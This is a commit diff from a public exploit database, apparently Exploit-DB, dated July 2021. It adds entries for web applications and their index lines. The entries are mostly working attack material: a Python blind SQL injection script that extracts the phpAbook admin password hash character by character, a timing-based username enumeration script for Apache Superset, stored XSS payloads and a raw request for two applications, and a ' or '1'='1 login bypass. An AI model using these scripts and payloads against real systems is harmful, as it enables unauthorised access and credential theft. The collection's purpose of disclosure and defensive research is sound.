DB: 2021-07-01
6 changes to exploits/shellcodes SAS Environment Manager 2.5 - 'name' Stored Cross-Site Scripting (XSS) Doctors Patients Management System 1.0 - SQL Injection (Authentication Bypass) phpAbook 0.9i - SQL Injection Apache Superset 1.1.0 - Time-Based Account Enumeration Simple Traffic Offense System 1.0 - Stored Cross Site Scripting (XSS)
This commit is contained in:
Offensive Security
parent
e79da91025
commit
293ca2aadb
6 changed files with 158 additions and 29 deletions
|
|
@ -1,28 +0,0 @@
|
|||
# Exploit Title: SAS Environment Manager 2.5 - 'name' Stored Cross-Site Scripting (XSS)
|
||||
# Date: 24/06/2021
|
||||
# Exploit Author: Luqman Hakim Zahari @ Saitamang
|
||||
# Vendor Homepage: https://support.sas.com/en/software/environment-manager-support.html
|
||||
# Version: 2.5
|
||||
# Tested on: CentOS 7
|
||||
# CVE : CVE-2021-35475
|
||||
|
||||
# Description #
|
||||
|
||||
SAS® Environment Manager 2.5 allows XSS through the Name field when creating/editing a server. The XSS will prompt when editing the Configuration Properties.
|
||||
|
||||
# Proof of Concept(PoC) # https://github.com/saitamang/CVE-2021-35475/blob/main/README.md
|
||||
|
||||
*Steps to Reproduce:*
|
||||
|
||||
[1.] Login to your system > On "Resource" tab > "Browse""
|
||||
[2.] Choose a "Platform"
|
||||
[3.] Click "Inventory" tab > Under "Servers" tab click "New..."
|
||||
[4.] Under "General Properties" tab on "Name" field , enter the payload(below) > Filled up other information and click "Ok" button
|
||||
|
||||
payload :
|
||||
|
||||
name=XSS"><marquee onstart=confirm('XSS')>@SAITAMANG
|
||||
|
||||
[5.] Successfully saved the payload page will shown
|
||||
[6.] Then scroll down to bottom under "Configuration Properties" tab > click "Edit" button
|
||||
[7.] Then the payload will be executed
|
||||
64
exploits/multiple/webapps/50072.py
Executable file
64
exploits/multiple/webapps/50072.py
Executable file
|
|
@ -0,0 +1,64 @@
|
|||
# Exploit Title: Apache Superset 1.1.0 - Time-Based Account Enumeration
|
||||
# Author: Dolev Farhi
|
||||
# Date: 2021-05-13
|
||||
# Vendor Homepage: https://superset.apache.org/
|
||||
# Version: 1.1.0
|
||||
# Tested on: Ubuntu
|
||||
|
||||
import sys
|
||||
import requests
|
||||
import time
|
||||
|
||||
scheme = 'http'
|
||||
host = '192.168.1.1'
|
||||
port = 8080
|
||||
|
||||
# change with your wordlist
|
||||
usernames = ['guest', 'admin', 'administrator', 'idontexist', 'superset']
|
||||
|
||||
url = '{}://{}:{}'.format(scheme, host, port)
|
||||
login_endpoint = '/login/'
|
||||
|
||||
session = requests.Session()
|
||||
|
||||
def get_csrf():
|
||||
token = None
|
||||
r = session.get(url + login_endpoint, verify=False)
|
||||
|
||||
for line in r.text.splitlines():
|
||||
if 'csrf_token' in line:
|
||||
try:
|
||||
token = line.strip().split('"')[-2]
|
||||
except:
|
||||
pass
|
||||
return token
|
||||
|
||||
csrf_token = get_csrf()
|
||||
|
||||
if not csrf_token:
|
||||
print('Could not obtain CSRF token, the exploit will likely fail.')
|
||||
sys.exit(1)
|
||||
|
||||
data = {
|
||||
'csrf_token':csrf_token,
|
||||
'username':'',
|
||||
'password':'abc'
|
||||
}
|
||||
|
||||
attempts = {}
|
||||
found = False
|
||||
|
||||
for user in usernames:
|
||||
start = time.time()
|
||||
data['username'] = user
|
||||
r = session.post(url + login_endpoint, data=data, verify=False, allow_redirects=True)
|
||||
roundtrip = time.time() - start
|
||||
attempts["%.4f" % roundtrip] = user
|
||||
|
||||
print('[!] Accounts existence probability is sorted from high to low')
|
||||
|
||||
count = 0
|
||||
|
||||
for key in sorted(attempts, reverse=True):
|
||||
count += 1
|
||||
print("%s. %s (timing: %s)" % (count, attempts[key], key))
|
||||
38
exploits/multiple/webapps/50073.txt
Normal file
38
exploits/multiple/webapps/50073.txt
Normal file
|
|
@ -0,0 +1,38 @@
|
|||
# Exploit Title: Simple Traffic Offense System 1.0 - 'Multiple' Stored Cross Site Scripting (XSS)
|
||||
# Date: 30-06-2021
|
||||
# Exploit Author: Barış Yıldızoğlu
|
||||
# Vendor Homepage: https://www.sourcecodester.com/
|
||||
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/trafic.zip
|
||||
# Version: 1.0
|
||||
# Tested on: Windows 10 Home 64 Bit + Wampserver Version 3.2.3
|
||||
|
||||
# Description: Almost all inputs contain Stored XSS on the website
|
||||
|
||||
Request:
|
||||
|
||||
POST /Trafic/save-reported.php HTTP/1.1
|
||||
Host: 127.0.0.1
|
||||
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101
|
||||
Firefox/78.0
|
||||
Accept:
|
||||
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 168
|
||||
Origin: http://127.0.0.1
|
||||
Connection: close
|
||||
Referer: http://127.0.0.1/Trafic/report-offence.php
|
||||
Cookie: PHPSESSID=vbsq5n2m09etst1mfcmq84gifo
|
||||
Upgrade-Insecure-Requests: 1
|
||||
|
||||
offence_id={Payload here}&vehicle_no={Payload here}&driver_license={Payload
|
||||
here}&name={Payload here}&address={Payload here}&gender={Payload
|
||||
here}&officer_reporting={Payload here}&offence={Payload here}
|
||||
|
||||
|
||||
# Steps to Reproduce:
|
||||
[1.] Login to the system [+] username=Torrahclef&pass=yemiyemi
|
||||
[2.] Go to the Report Offense page
|
||||
[3.] Send the request above with the Stored XSS payload
|
||||
[4.] Dashboard and Offense list pages will be triggered
|
||||
38
exploits/php/webapps/50071.py
Executable file
38
exploits/php/webapps/50071.py
Executable file
|
|
@ -0,0 +1,38 @@
|
|||
# Exploit Title: phpAbook 0.9i - SQL Injection
|
||||
# Date: 2021-06-29
|
||||
# Vendor Homepage: http://sourceforge.net/projects/phpabook/
|
||||
# Exploit Author: Said Cortes, Alejandro Perez
|
||||
# Version: v0.9i
|
||||
# This was written for educational purpose. Use it at your own risk.
|
||||
# Author will be not responsible for any damage.
|
||||
|
||||
import requests
|
||||
import argparse
|
||||
import string
|
||||
import sys
|
||||
|
||||
|
||||
def exploit(session,host):
|
||||
print("Starting Exploit\nSearching Admin Hash...")
|
||||
passwordhash = ''
|
||||
for i in range(1,33):
|
||||
charset = string.digits + string.ascii_lowercase
|
||||
for letter in charset:
|
||||
burp0_url = f"{host}/index.php"
|
||||
burp0_data = {"auth_user": f"admin'-IF((SELECT MID(password,{i},1) from ab_auth_user where uid=1)='{letter}',SLEEP(3),0)#", "auth_passwd": "admin", "lang": "en", "submit": "Login"}
|
||||
try:
|
||||
session.post(burp0_url, data=burp0_data, timeout=1)
|
||||
except requests.Timeout:
|
||||
passwordhash += letter
|
||||
continue
|
||||
print("admin:"+passwordhash)
|
||||
|
||||
|
||||
|
||||
|
||||
if __name__ == "__main__" :
|
||||
session = requests.session()
|
||||
parser = argparse.ArgumentParser()
|
||||
parser.add_argument("-u","--url",help="host url \nex: http://127.0.0.1/phpabook",required=True)
|
||||
arg = parser.parse_args()
|
||||
exploit(session,arg.url)
|
||||
14
exploits/php/webapps/50074.txt
Normal file
14
exploits/php/webapps/50074.txt
Normal file
|
|
@ -0,0 +1,14 @@
|
|||
# Exploit Title: Doctors Patients Management System 1.0 - SQL Injection (Authentication Bypass)
|
||||
# Date: 06/30/2021
|
||||
# Exploit Author: Murat DEMIRCI (butterflyhunt3r)
|
||||
# Vendor Homepage: https://www.codester.com/
|
||||
# Software Link: https://www.codester.com/items/31349/medisol-doctors-patients-managment-system
|
||||
# Version: 1.0
|
||||
# Tested on: Windows 10
|
||||
# Description : The admin login of this app is vulnerable to sql injection login bypass. Anyone can bypass admin login authentication.
|
||||
|
||||
# Proof of Concept :
|
||||
http://test.com/PATH/signin
|
||||
|
||||
# Username : anything
|
||||
# Password : ' or '1'='1
|
||||
|
|
@ -44207,6 +44207,9 @@ id,file,description,date,author,type,platform,port
|
|||
50063,exploits/php/webapps/50063.txt,"Simple Client Management System 1.0 - 'uemail' SQL Injection (Unauthenticated)",2021-06-25,"Barış Yıldızoğlu",webapps,php,
|
||||
50064,exploits/php/webapps/50064.rb,"Lightweight facebook-styled blog 1.3 - Remote Code Execution (RCE) (Authenticated) (Metasploit)",2021-06-25,"Maide Ilkay Aydogdu",webapps,php,
|
||||
50066,exploits/php/webapps/50066.txt,"WordPress Plugin YOP Polls 6.2.7 - Stored Cross Site Scripting (XSS)",2021-06-28,"Toby Jackson",webapps,php,
|
||||
50067,exploits/multiple/webapps/50067.txt,"SAS Environment Manager 2.5 - 'name' Stored Cross-Site Scripting (XSS)",2021-06-28,"Luqman Hakim Zahari",webapps,multiple,
|
||||
50074,exploits/php/webapps/50074.txt,"Doctors Patients Management System 1.0 - SQL Injection (Authentication Bypass)",2021-06-30,"Murat DEMİRCİ",webapps,php,
|
||||
50068,exploits/macos/webapps/50068.txt,"Atlassian Jira Server/Data Center 8.16.0 - Reflected Cross-Site Scripting (XSS)",2021-06-28,Captain_hook,webapps,macos,
|
||||
50069,exploits/hardware/webapps/50069.py,"Netgear WNAP320 2.0.3 - 'macAddress' Remote Code Execution (RCE) (Unauthenticated)",2021-06-28,"Bryan Leong",webapps,hardware,
|
||||
50071,exploits/php/webapps/50071.py,"phpAbook 0.9i - SQL Injection",2021-06-30,"Alejandro Perez",webapps,php,
|
||||
50072,exploits/multiple/webapps/50072.py,"Apache Superset 1.1.0 - Time-Based Account Enumeration",2021-06-30,"Dolev Farhi",webapps,multiple,
|
||||
50073,exploits/multiple/webapps/50073.txt,"Simple Traffic Offense System 1.0 - Stored Cross Site Scripting (XSS)",2021-06-30,"Barış Yıldızoğlu",webapps,multiple,
|
||||
|
|
|
|||
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue